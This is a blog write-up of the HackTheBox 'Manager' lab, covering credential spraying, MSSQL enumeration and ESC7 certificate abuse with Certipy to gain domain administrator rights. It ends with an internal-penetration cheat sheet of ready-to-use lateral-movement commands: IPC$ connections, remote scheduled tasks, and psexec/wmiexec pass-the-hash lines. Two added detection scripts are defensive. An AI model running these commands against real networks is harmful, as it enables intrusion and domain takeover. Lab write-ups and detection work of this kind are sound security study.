Holiday Box-Hacking, Round One: Manager

HTB, let's go!

Target machine: https://app.hackthebox.com/machines/Manager

User Flag

With the IP address in hand, start with a broad nmap scan:

Host is up (0.39s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-02 21:18:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-02-02T21:20:27+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-02-02T12:29:19
|_Not valid after: 2054-02-02T12:29:19
|_ssl-date: 2024-02-02T21:20:27+00:00; +6h59m59s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-02-02T21:20:28+00:00; +6h59m57s from scanner time.
3269/tcp open globalcatLDAPssl?
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-02-02T21:20:25+00:00; +7h00m00s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 1s, median: 6h59m59s
| smb2-time:
| date: 2024-02-02T21:19:48
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 383.31 ms 10.10.14.1 (10.10.14.1)
2 384.80 ms 10.10.11.236 (10.10.11.236)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.99 seconds

The scan shows HTTP, SQL Server and other services open, and the host is a domain controller: the domain is manager.htb and the DC's hostname is dc01.manager.htb.

The web interface looks like this; at a glance it is a static page:

Run a directory scan first:

Nothing there, so set the web angle aside for now and look at SMB:

Then password spraying:

Try to list the shares:

Logging in with the sprayed credentials shows nothing useful:

So port 445 offers no immediate path either, but the useful part is that we now have two usernames and passwords. There is also an MSSQL service that can be probed, so spray the credentials once more against it:

Promising; log in and take a look:

There are no databases. The first thought is naturally command execution, but trying to run commands through xp_cmdshell fails for lack of permission:

Reference article: http://www.bmth666.cn/2023/08/06/MSSQL-%E6%95%B0%E6%8D%AE%E5%BA%93%E5%88%A9%E7%94%A8/

MSSQL can still be used to list directories: EXEC master.sys.xp_dirtree 'C:\', 1, 1;

Eventually a copy of the source code turns up under the web directory; it can be downloaded locally, and it turns out to be a static website.

It contains a configuration file:

The nmap scan showed WinRM open, so try connecting with the credentials from that XML file. That works, and the flag is obtained:

Root Flag

Checking group membership, the current user is in the Certificate Service DCOM Access group, and the host also provides a CA service. A CA on the DC, nice.

Someone had trashed the box, so after resetting it the next day I checked it with Certipy:

It detects ESC7. Below is the description of it, as given in the Certipy documentation:

ESC7

ESC7 is when a user has the Manage CA or Manage Certificates access right on a CA. There are no public techniques that can abuse the Manage Certificates access right for domain privilege escalation, but it can be used to issue or deny pending certificate requests.

The “Certified Pre-Owned” whitepaper mentions that this access right can be used to enable the EDITF_ATTRIBUTESUBJECTALTNAME2 flag to perform the ESC6 attack, but this will not have any effect until the CA service (CertSvc) is restarted. When a user has the Manage CA access right, the user is also allowed to restart the service. However, it does not mean that the user can restart the service remotely. Furthermore, ESC6 might not work out of the box in most patched environments due to the May 2022 security updates.

Instead, I’ve found another technique that doesn’t require any service restarts or configuration changes.

Prerequisites

In order for this technique to work, the user must also have the Manage Certificates access right, and the certificate template SubCA must be enabled. With the Manage CA access right, we can fulfill these prerequisites.

The technique relies on the fact that users with the Manage CA and Manage Certificates access right can issue failed certificate requests. The SubCA certificate template is vulnerable to ESC1, but only administrators can enroll in the template. Thus, a user can request to enroll in the SubCA - which will be denied - but then issued by the manager afterwards.

If you only have the Manage CA access right, you can grant yourself the Manage Certificates access right by adding your user as a new officer.

>$ certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
>Certipy v4.0.0 - by Oliver Lyak (ly4k)

>[*] Successfully added officer 'John' on 'corp-DC-CA'

The SubCA template can be enabled on the CA with the -enable-template parameter. By default, the SubCA template is enabled.

>$ certipy ca -ca 'corp-DC-CA' -enable-template SubCA -username john@corp.local -password Passw0rd
>Certipy v4.0.0 - by Oliver Lyak (ly4k)

>[*] Successfully enabled 'SubCA' on 'corp-DC-CA'

Attack

If we have fulfilled the prerequisites for this attack, we can start by requesting a certificate based on the SubCA template.

This request will be denied, but we will save the private key and note down the request ID.

>$ certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
>Certipy v4.0.0 - by Oliver Lyak (ly4k)

>[*] Requesting certificate via RPC
>[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
>[*] Request ID is 785
>Would you like to save the private key? (y/N) y
>[*] Saved private key to 785.key
>[-] Failed to request certificate

With our Manage CA and Manage Certificates, we can then issue the failed certificate request with the ca command and the -issue-request <request ID> parameter.

>$ certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
>Certipy v4.0.0 - by Oliver Lyak (ly4k)

>[*] Successfully issued certificate

And finally, we can retrieve the issued certificate with the req command and the -retrieve <request ID> parameter.

>$ certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -retrieve 785
>Certipy v4.0.0 - by Oliver Lyak (ly4k)

>[*] Rerieving certificate with ID 785
>[*] Successfully retrieved certificate
>[*] Got certificate with UPN 'administrator@corp.local'
>[*] Certificate has no object SID
>[*] Loaded private key from '785.key'
>[*] Saved certificate and private key to 'administrator.pfx'

First create an officer, then enable the certificate template and request a certificate. The request is denied, but we save the private key and note down the request ID:

Issue the requested certificate, then retrieve it (issuing may fail; retrying a couple of times works, but make sure the certificate ID stays the same):

Then pass the certificate to obtain a Kerberos TGT and the administrator's hash:

It errors out: the clock must first be synchronised with the DC:

The administrator's hash is obtained:

Logging in with the hash gives administrator privileges and the root flag:
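As an added defensive example (not part of the original post or of Certipy): the ESC7 sequence above leaves a distinctive trail in the CA's audit events, a request denied for its requester and later issued by a certificate manager, usually preceded by a change to the CA's permissions when an officer is added. The script below correlates constructed events of that shape; the event IDs are the standard Windows Certification Services audit events, the field names are simplified, and the user names are made up.

```python
# Added example (not from the original post): correlate AD CS audit events to flag the
# ESC7 sequence: a request denied for its requester and later issued by a certificate
# manager, usually after the CA's permissions changed (officer added). Event IDs are the
# standard Windows "Audit Certification Services" events (4882 CA permissions changed,
# 4886 request received, 4887 request issued, 4888 request denied); they are only logged
# when CA auditing is enabled. Field names are simplified and all events are constructed.
from typing import Dict, List

Event = Dict[str, str]

def detect_esc7(events: List[Event]) -> List[Event]:
    """Return alerts for denied-then-issued requests and for CA permission changes."""
    alerts: List[Event] = []
    requests: Dict[str, Event] = {}  # req_id -> 4886 record (template, SAN)
    denied: Dict[str, Event] = {}    # req_id -> 4888 record
    for ev in sorted(events, key=lambda e: e["ts"]):
        eid = ev["id"]
        if eid == "4882":
            alerts.append({"kind": "ca_permissions_changed", "subject": ev["subject"], "ts": ev["ts"]})
        elif eid == "4886":
            requests[ev["req_id"]] = ev
        elif eid == "4888":
            denied[ev["req_id"]] = ev
        elif eid == "4887" and ev["req_id"] in denied:
            req = requests.get(ev["req_id"], {})
            template, san = req.get("template", "?"), req.get("san", "")
            alerts.append({
                "kind": "denied_then_issued", "req_id": ev["req_id"], "ts": ev["ts"],
                "requester": denied[ev["req_id"]]["requester"],
                "template": template, "san": san,
                # a SubCA request carrying a SAN is the ESC1-style end state of ESC7
                "severity": "high" if san and template == "SubCA" else "medium",
            })
    return alerts

# Constructed sample: officer added, a SubCA request with a privileged UPN denied and then
# issued, and one unrelated machine request that was issued normally.
SAMPLE_EVENTS: List[Event] = [
    {"id": "4882", "ts": "2024-02-03T10:01:00Z", "subject": "MANAGER\\operator"},
    {"id": "4886", "ts": "2024-02-03T10:02:00Z", "req_id": "785", "requester": "MANAGER\\operator",
     "template": "SubCA", "san": "administrator@manager.htb"},
    {"id": "4888", "ts": "2024-02-03T10:02:01Z", "req_id": "785", "requester": "MANAGER\\operator"},
    {"id": "4886", "ts": "2024-02-03T10:02:30Z", "req_id": "786", "requester": "MANAGER\\DC01$",
     "template": "Machine", "san": ""},
    {"id": "4887", "ts": "2024-02-03T10:02:31Z", "req_id": "786", "requester": "MANAGER\\DC01$"},
    {"id": "4887", "ts": "2024-02-03T10:03:00Z", "req_id": "785", "requester": "MANAGER\\operator"},
]
```

Running detect_esc7(SAMPLE_EVENTS) yields one ca_permissions_changed alert and one high-severity denied_then_issued alert for request 785; the normally issued request 786 produces nothing.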

Conclusion

A short set of summary notes on internal network penetration:

Internal penetration generally starts with gathering basic information to determine the role of the current server, the network environment and so on:

systeminfo # detailed system information
net start # running services
tasklist # process list
schtasks # scheduled tasks

Then collect information about the network architecture:

ipconfig /all # check for a domain (DNS)
net view /domain # check whether a domain exists
net time /domain # identify the primary domain controller
netstat -ano # currently open network ports
nslookup # name resolution

Default groups in the system:

Domain Admins: domain administrators (full control of the domain controllers by default)
Domain Computers: machines in the domain
Domain Controllers: domain controllers
Domain Guests: domain guests, low privilege
Domain Users: domain users
Enterprise Admins: enterprise administrators (full control of the domain controllers by default)

Querying user identity:

whoami /all # user privileges
net config workstation # logon information
net user # local users
net localgroup # local user groups
net user /domain # domain user information
net group /domain # domain group information
wmic useraccount get /all # detailed domain user information
net group "Domain Admins" /domain # query the domain administrator accounts
net group "Enterprise Admins" /domain # query the enterprise administrators group
net group "Domain Controllers" /domain # query the domain controllers

Common places to collect credentials:

1. Site source-code backups, database backups and similar files
2. Web management entry points for databases, such as phpMyAdmin
3. Passwords and cookies saved in browsers
4. Other users' sessions, 3389 and ipc$ connection history, recycle bin contents
5. Wi-Fi passwords saved by Windows
6. Accounts and passwords used inside the network, for example Email, VPN, FTP, OA

Lateral movement with plaintext credentials: after compromising a host, gather user credentials locally and use at and schtasks to move laterally.

Workflow:

  1. Establish an IPC connection to the target host
  2. Copy the command script to be executed to the target host
  3. Check the target's time and create a scheduled task (at, schtasks) to run the copied script
  4. Remove the IPC connection

net use \\server\ipc$ "password" /user:username # workgroup
net use \\server\ipc$ "password" /user:domain\username # within a domain
dir \\xx.xx.xx.xx\C$\ # list files
copy \\xx.xx.xx.xx\C$\1.bat 1.bat # download a file
copy 1.bat \\xx.xx.xx.xx\C$ # copy a file over
net use \\xx.xx.xx.xx\ipc$ /del # remove the IPC connection
net view xx.xx.xx.xx # view the target's shares

#at < Windows 2012
net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator # establish the IPC connection
copy add.bat \\192.168.3.21\c$ # copy the file to execute to the target
at \\192.168.3.21 15:47 c:\add.bat # add the scheduled task

#schtasks >= Windows 2012
net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\administrator # establish the IPC connection
copy add.bat \\192.168.3.32\c$ # copy the file to the target's C: drive
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F # create the adduser task

schtasks /run /s 192.168.3.32 /tn adduser /i # run the adduser task
schtasks /delete /s 192.168.3.21 /tn adduser /f # delete the adduser task

Common IPC error codes:

(1) 5: access denied; the account used is probably not an administrator and privileges must be raised first
(2) 51: network problem; Windows cannot find the network path
(3) 53: network path not found; possible causes are a wrong IP address, the target being powered off, the target's Lanmanserver service not running, or a firewall
(4) 67: network name not found; the local Lanmanworkstation service is not running, or the target has removed ipc$
(5) 1219: the supplied credentials conflict with an existing credential set, meaning an IPC$ connection already exists and must be deleted first
(6) 1326: wrong username or password
(7) 1792: the target's NetLogon service is not running; this often happens when connecting to a domain controller
(8) 2242: the user's password has expired; the target enforces an account policy with periodic password changes

Using the SMB service (port 445), remote execution can be done with pass-the-hash or with plaintext credentials:

#psexec, approach 1: needs an existing IPC connection; psexec takes plaintext credentials or a hash
net use \\192.168.3.32\ipc$ "admin!@#45" /user:administrator
psexec \\192.168.3.32 -s cmd # requires an existing IPC connection; -s runs as SYSTEM

#psexec, approach 2: no IPC connection needed, supply the plaintext account and password directly
psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd
psexec -hashes :$HASH$ ./administrator@10.1.2.3
psexec -hashes :$HASH$ domain/administrator@10.1.2.3
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

The WMI service (port 139) can also be used; this method does not leave traces in the target's logging system:

# built-in WMIC, plaintext credentials, no output returned
wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c ipconfig >C:\1.txt"

# built-in cscript, plaintext credentials, output returned
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

# impacket suite wmiexec, plaintext credentials or hash, output returned (exe version)
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

Personally I still find impacket the handiest.
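As an added detection example (not from the original post or from impacket): the WMI execution commands above all start their payload as a child process of WmiPrvSE.exe, and impacket's wmiexec uses a recognisable command-line form to read output back over the ADMIN$ share. The script below classifies constructed process-creation records on those two traits; the record fields mimic Sysmon Event ID 1 / Security 4688 and the user names are made up.

```python
# Added example (not from the original post): classify process-creation records to spot
# remote WMI execution of the kind shown above. Both "wmic ... process call create" and
# impacket's wmiexec start the command as a child of WmiPrvSE.exe, and wmiexec uses the
# well-known "cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1" form so it
# can read the output back over SMB. Records mimic Sysmon Event ID 1 / Security 4688
# fields and are constructed; the user names are made up.
import re
from typing import Dict, List

WMIEXEC_RE = re.compile(r"/Q /c .+ 1> \\\\127\.0\.0\.1\\ADMIN\$\\__\d+(\.\d+)? 2>&1", re.IGNORECASE)

def classify(rec: Dict[str, str]) -> str:
    """'wmiexec' for the impacket pattern, 'wmi_child' for any other WmiPrvSE child, else 'benign'."""
    parent = rec.get("ParentImage", "").lower()
    if not parent.endswith("\\wmiprvse.exe"):
        return "benign"
    return "wmiexec" if WMIEXEC_RE.search(rec.get("CommandLine", "")) else "wmi_child"

def scan(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the records worth reviewing, annotated with the match kind."""
    findings: List[Dict[str, str]] = []
    for rec in records:
        kind = classify(rec)
        if kind != "benign":
            findings.append({"kind": kind, "user": rec.get("User", "?"), "cmd": rec["CommandLine"]})
    return findings

# Constructed sample: a wmiexec-style command, a wmic-style command, and a benign shell.
SAMPLE_RECORDS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "User": "MANAGER\\administrator",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1706900000.123 2>&1"},
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "User": "MANAGER\\administrator",
     "CommandLine": r"cmd.exe /c ipconfig >C:\1.txt"},
    {"ParentImage": r"C:\Windows\explorer.exe", "User": "MANAGER\\user1",
     "CommandLine": r"cmd.exe /c ipconfig"},
]
```

The wmi_child class is a review queue rather than an alert on its own, since management agents also spawn from WmiPrvSE.exe; the wmiexec pattern is specific enough to alert on directly.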

Kerberos protocol:

  1. The client computes the NTLM hash of the plaintext password, encrypts it together with a timestamp and sends it to the KDC; the KDC verifies the user and, on success, creates a TGT.

  2. The TGT is encrypted and signed and returned to the client machine; only the domain user krbtgt can read the TGT data in Kerberos. The client then sends the TGT to the domain controller (KDC) to request a TGS (ticket-granting service) ticket, and the TGT is verified.

  3. After verification succeeds, the target service account's NTLM and the TGT are encrypted and the encrypted result is returned to the client.

PTH is a classic attack technique in internal penetration: the attacker can access remote hosts or services directly with the LM hash and NTLM hash without supplying a plaintext password. If NTLM authentication is disabled, PsExec cannot use an obtained NTLM hash to connect remotely, but the attack can still succeed with mimikatz. On 8.1/2012 R2, and on Win 7/2008 R2/8/2012 with patch KB2871997 installed, AES keys can be used in place of the NT hash for a PTK attack.

pth: without the patch any user can connect; with the patch only administrator can connect

ptk: only with the patch can any user connect, using aes256

Golden tickets, silver tickets and various privilege-escalation techniques will be summarised when I run into them.

Author: Alex
Link: http://example.com/2024/02/02/hackthebox-machine-manager/
Copyright: Unless otherwise stated, all posts on this blog are licensed under CC BY-NC-SA 4.0. Please credit Alex's blog when reposting~